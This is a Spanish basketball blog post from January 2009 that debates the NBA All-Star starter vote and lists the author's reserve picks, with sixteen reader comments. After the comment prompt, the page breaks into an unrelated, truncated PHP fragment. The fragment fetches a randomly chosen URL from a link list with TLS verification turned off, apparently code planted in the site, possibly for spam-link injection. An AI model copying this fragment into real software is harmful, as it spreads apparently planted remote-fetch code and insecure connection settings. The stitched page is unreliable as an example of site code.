Buscando equipos para el All-Star

23 de January de 2009 por txusma

Anoche se hicieron públicas las votaciones para escoger los quintetos iniciales del partido del All-Star que ha de celebrarse en Phoenix el próximo 15 de febrero. En el Este, Dwight Howard, con más de 3.000.000 de votos, lidera a un quinteto que también estará formado por Allen Iverson, Dwyane Wade, LeBron James y Kevin Garnett. Frente a ellos estarán Chris Paul, Kobe Bryant, Amaré Stoudamire, Tim Duncan y Yao Ming.

Analicemos primero los resultados de las votaciones que podéis consultar aquí. En el Oeste creo que no hay nada que objetar en los quintetos. La única posible duda sería la inclusión de Shaquille en lugar de Yao Ming, pero desengañémonos, “Big Diesel”, aún estando a un buen nivel, se ha perdido demasiados partidos como para hacer sombra al chino.

En todo caso, en las votaciones del Oeste hay cosas que me hacen hervir la sangre. La primera y más impactante es la tercera posición de Bruce Bowen a escasos 70.000 votos de Stoudamire en lo que me da la impresión que ha de ser una campaña orquestada desde algún programa de humor americano, porque sinó es incomprensible. Sorprende también encontrar a Ron Artest por encima de jugadores como Dirk Nowitzki, Pau Gasol o Lamarcus Aldridge, seguramente no tan extrovertidos ni mediáticos como el alero de los Rockets. Entre los escoltas y bases creo que todos podemos estar de acuerdo con que Chauncey Billups y Brandon Roy se merecen a día de hoy unos 500.000 votos más, al menos los necesarios para acabar por encima de jugadores como Tracy McGrady, Jamaal Crawford o Rafer Alston.

En el Este todos los aficionados de la NBA deberíamos congratularnos de que Yi Jianlian no haya conseguido por bien poco los votos necesarios para ir al All-Star, aunque su lesión se lo impediría actualmente. Verlo por encima de jugadores como Danny Granger, Paul Pierce o Chris Bosh te hace perder la fe en este sistema de elección. Tampoco me convence lo más mínimo la presencia de Iverson en el quinteto, y es más, yo habría apostado por un jugador que ha de ver como es superado por otros nueve bases o escoltas, Joe Johnson. Calderón, debido a que su nivel no es el mismo que el de la temporada pasada y al mal papel de Toronto principalmente, se queda muy lejos de los puestos de honor. Entre los pívots, después de Dwight Howard presenciamos el más absoluto vacío. Ojito a las coñas de votar a Gilbert Arenas y Brendan Haywood cuando no han disputado ni un partido esta temporada.

En definitiva, esto de las elecciones populares es un auténtico circo. Un circo que hubiese podido provocar que jugadores como Bruce Bowen o Yi Jianlian estuviesen presentes como titulares.

Ahora es el momento de escoger los 7 jugadores por conferencia restantes que acompañarán a los titulares. Ahí van los míos:

OESTE

Chauncey Billups: La mejoría que ha experimentado Denver desde su llegada y el gran nivel al que está jugando tanto él como el equipo hacen que su presencia en el All-Star deba ser indiscutible.

Deron Williams: Tras perderse los primeros partidos por lesión ha asumido de nuevo el liderazgo en los Jazz, a los que mantiene en Playoffs a pesar de la baja de su escudero Carlos Boozer.

Brandon Roy: Los Blazers que lidera con firmeza están haciendo una buena campaña y su clase y talento no deberían ver el partido por televisión.

Kevin Durant: No tiene aún el nombre de otros jugadores más consagrados y su equipo es uno de los peores pero su nivel individual es, sin lugar a duda, de All-Star.

Carmelo Anthony: La mejoría de Denver ha acarreado también la suya (¿o habrá sido al revés?). Un Melo más centrado merece estar en Phoenix si su lesión en la mano se lo permite.

Dirk Nowitzki: Dallas está fuera de Playoffs pero él sigue luchando contra el mundo. Tras un inicio de temporada mediocre está recuperando las buenas sensaciones. Su presencia podría acarrear la ausencia de Jason Kidd.

Pau Gasol: Desde la posición de ala-pívot ha convertido su aportación al mejor equipo de la NBA, estadísticamente hablando, en casi imprescindible. Si este equipo además son los Lakers, su presencia es casi segura.

Se quedan fuera por poco: Tony Parker, Steve Nash, Jason Kidd, Al Jefferson, Lamarcus Aldridge, Manu Ginobili, Shaquille O’Neal, David West y Marcus Camby.

ESTE

Devin Harris: Su nivel al inicio de temporada fue simplemente estratosférico. Una pequeña lesión le ha roto la progresión pero merece, sin duda, ir al All-Star.

Joe Johnson: Para mí debería ser titular. Él es el factor diferencial que tiene a los Hawks cuartos en el Este.

– Danny Granger: Los Pacers, al contrario de lo que muestra su cómputo de victorias-derrotas demuestran un buen nivel y él es el cuarto anotador de toda la liga. ¿Quién osa dejarlo fuera?

Andre Iguodala: Empezó la temporada como los Sixers, completamente descolocado y fuera de sitio. Ahora en cambio ha puesto la directa y ya ha metido a Philadelphia en Playoffs.

Paul Pierce: Junto con Garnett es el alma de los Celtics, el equipo que más victorias acumula a estas alturas de la temporada.

Chris Bosh: Los Raptors no son lo que eran pero no será por culpa de Bosh: 23 puntos y 10 rebotes por partido le contemplan.

David Lee: Es de los mejores jugadores interiores del Este y alguien, aparte de Howard y Bosh, deberá jugador por dentro.

Se quedan fuera por poco: Caron Butler, Antawn Jamison, Jameer Nelson, Vince Carter, Andre Miller y Mike Bibby.

Evidentemente mi apuesta es muy arriesgada porque finalmente el nombre del jugador pesa más que su actuación durante la temporada a poco buena que ésta haya sido. ¿O alguien se imagina a Shaq, Nash o Kidd sin All-Star?

Comenta

16 comentarios a esta entrada

  1. Sergio dice:
    #1

    yo meteria a shaq y tony parker por deron o bilups y gasol o carmelo anthony… lo digo pensando en como va a salir… no pensando en quien yo meteria q dsd luego sty bastante de acuerdo…

      Citar

  2. Llukas 70 dice:
    #2

    Los quintetos titulares son siempre lo mismo, por eso no ha habido sorpresa.
    Pau Gasol tiene que estar al all-star por cojones, una superestrella como el no puede estar otro año mas sin estar en este partido, no se lo mereceria, pienso que esta muy infravalorado.
    Respecto a lo del chino (el malo), si llega a entrar en el quinteto titular me ocurre algo…
    Txusma te has dejado a T-Mac, un hombre como el tiene que estar siempre al all-star, no puede faltar, vale que no esta teniendo una temporada estadisticamente como las demas… pero es McGrady.

      Citar

  3. Txusma dice:
    #3

    La verdad, llukas70, es que no me he olvidado de McGrady. Lo he dejado de lado conscientemente mas que nada pq el McGrady de esta temporada, q se pasea por los campos renqueante, no es aquel McGrady que nos asombraba a todos hace unos años. El All-Star no se deberia regir por el nombre y el recuerdo sino por la temporada actual.

      Citar

  4. Pablo dice:
    #4

    Y Harris????????????

      Citar

  5. Viva_Dirk dice:
    #5

    De los que dice Txus:

    Billups: Desde luego, incluso sin Melo los Nuggets estan funcionando muy bien y sin duda es gracias a el.

    Deron Williams: Es el base que mas me gusta pero creo que su temporada es inferior a la de otros G´s del Oeste como Tony Parker, Billups o Roy, y contando que en el quinteto titular ya van 2 guards, yo no lo llevaría.

    Brandon Roy: Si, en un equipo lleno de gente inconsistente el es el lider absoluto.

    Kevin Durant: También, para muchos será dudoso por la situación de su equipo, pero 24 puntos, 6 rebotes, 47% en tiros de campo y 42% en triples es una temporada impresionante por parte del sophomore.

    Carmelo Anthony: Supongo que estará seguro, pero yo no lo llevaria ni de coña. Nowitzki, Durant y Gasol estan haciendolo bastante mejor que el.

    Dirk Nowitzki: Y tanto que si, crack de cracks.

    Pau Gasol: Fijo que debe ir y casi fijo que irá, ha hecho partidazos contra algunos de los grandes y su temporada es buenísima.

    En lugar de Deron y Melo yo llevaría a:

    Tony Parker: Esta en el máximo de asistencias de su carrera por partido y cuando ha sido baja el equipo lo ha notado una barbaridad. Como jugador individual me parece que está lejísimos de Deron pero creo que su temporada es mejor.

    Shaquille O’Neal: En los 7 partidos sin el los Suns dejan una marca de 2-5, Shaq ha vuelto y está haciendo un temporadón, para colmo esta por encima del 60% en tiros libres.

    En el Este:

    Devin Harris: Si hay que llevar a alguien de NJ yo llevaría a Carter, anotan lo mismo y con porcentajes parecidos, el tema rebotes/asistencias los sigue dejando igualados, Carter pierde menos balones y ha metido alguna de las mejores canastas de la temporada sobre la bocina.

    Joe Johnson: Tampoco tengo ninguna duda, jugadorazo.

    Danny Granger: Caso similar al de Durant, espero que vayan ambos.

    Andre Iguodala: Ni de coooooooooña. Cualquiera de los 3 secundarios de Orlando o Josh Smith lo merecen mas que el.

    Paul Pierce: Si, ha sido el mas constante en los verdes y ha dado un paso adelante en conocimiento del juego.

    Chris Bosh: Indiscutible también, estén como estén los Raptors.

    David Lee: ¿Lo que? Es el único que juega por dentro en los Knicks y tiene que notarse pero su año es peor que el de los que he dicho para sustituir a Iguodala, incluso Prince podria estar por delante suyo.

    Para sustituir a Harris, Iguodala y Lee llevaria a:

    Vincer Carter: Lo dicho, lo merece mas y además es mas ‘amazing’.

    Rashard Lewis: Este año si se está ganando el contrarto, 19 puntos por noche y una autentica pesadilla para los rivales desde la linea de 3.

    Antawn Jamison: Los Wizars dan pena pero no será por los 21 puntos y 9 rebotes que promedia Jamison cada noche.

      Citar

  6. Jabho dice:
    #6

    Lo de las votaciones como dices un circo.

    Respecto a los propuestos lo firmo. En el este Nelson se queda muy cerca de Harris, pero el Harris de incio merece el puesto un pelo mas que Nelson. Horford quizás podía haber disputado el puesto a Lee y Carter a Pierce o Igu … Pero los que porpones son justos.

    En el Oeste quizás me resulte demasiado poco lo que ha hecho DEron y creo que tiraría de Parker. Luego llevaría Shaq porque de lo que se trat es de dar espectaculo y el tipo es showman, pero como no me sobra nadie pues que vayan 13 🙂

      Citar

  7. the choosen one dice:
    #7

    yo a kidd y a nash si

      Citar

  8. lavitta dice:
    #8

    Yo pondría, sin lugara duda, a Shaq por durant y ha Nash o Parker por Caramelo Anthony.
    Por el este me prece una temeridad osar no convocar a Vicente. Aunque haya perdido potencia, sigue siendo un all star (y que conste que no es un jugador de mi devoción). cualquiera escepto Pierce y Bosh se puede quedar fuera para dejarle el puesto.
    Aupa Peñas!

      Citar

  9. Viva_Dirk dice:
    #9

    Yo veo claro a otro con méritos, Al Jefferson esta en 22-10, pero no se si llevando a Durant meterán a otro de los que claramente no llegan a Play-Offs.

      Citar

  10. parra dice:
    #10

    Las cosas que tiene que leer uno, la virgen…

    Que si “ha” Nash, que si “escepto”, que daño ha hecho la LOGSE, que daño….

    Por otra parte, gran blog, lo descubrí hace poco,no me preguntes como, pero gran blog NBa, ¡enhorabuena!

      Citar

  11. kantonyo dice:
    #11

    Coincido en que no es la mejor forma de elegir a los Allstars, yo creo que la mejor forma sería al estilo del FIFA WORLD PLAYER, donde tanto los entrenadores como los capitas votan a sus favoritos, en este caso podrian votar todos los jugadores, con la excepción de votar compañeros. Y así seguro que saldrían unas votaciones más justas y cercanas al merito de cada jugador.

    Teniendo en cuenta los jugadores titulares que han sido elegidos yo apostaria por estos suplentes:

    ESTE – (Iverson, Wade, James, Garnett, Howard)

    Harris (Nelson), Johnson, Carter, Pierce, Granger, Bosh y Lee(Okafor)

    OESTE – (Paul, Bryant, Stoudemire, Duncan, Yao)

    Parker (Deron), Billups(Durant), Roy, Anthony, Gasol, Nowitzki y O’Neal (Jefferson)

      Citar

  12. Jabho dice:
    #12

    Bienvenido Parra.

    Los que escribimos el blog no somos de la logse diría que ninguno. La ortografía es importante y le prestamos atención, pero errar es humano. Trataremos de que pase menos.

    Lo dicho, bienvenido y esperamos disfrutar más de tus comentarios.

      Citar

  13. Txusma dice:
    #13

    Jabho, Parra se refiere a uno de los comentarios pero es cierto que la ortografía es algo que hay que cuidar entre todos.

      Citar

  14. Txusma dice:
    #14

    En el MARCA publican que Gasol estará en el All-Star por lo que comenta Dave McMenamin en un artículo de NBA.com. No he encontrado el articulo en cuestión pero lo que más me ha llamado la atención es la inclusión de Paul Millsap en los posibles jugadores del All-Star. Reconozco que Millsap si que se me había olvidado por completo. ¿Pensáis que tiene opciones?

      Citar

  15. MagicJohnson32 dice:
    #15

    Muchas gracias, Parra, por el comentario y por la enhorabuena.

    Gasol estará en el All-Star. Vamos, ni me planteo su ausencia. Millsap tiene alguna posibilidad, porque sus números como titular son una barbaridad. Particularmente no me gusta, pero ha hecho méritos.

      Citar

  16. Txusma dice:
    #16

    Pues al final parece ser que Ray Allen sustituira a Jameer Nelson y Maurice Williams a Chris Bosh, ambos por lesión. Dejando claro que creo que ambos son dignos contendientes parece que queda claro que nadie se ha preocupado de equilibrar los equipos. El juego interior del Este, Howard a parte, es inexistente… Q clase de partido surgira de aqui?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>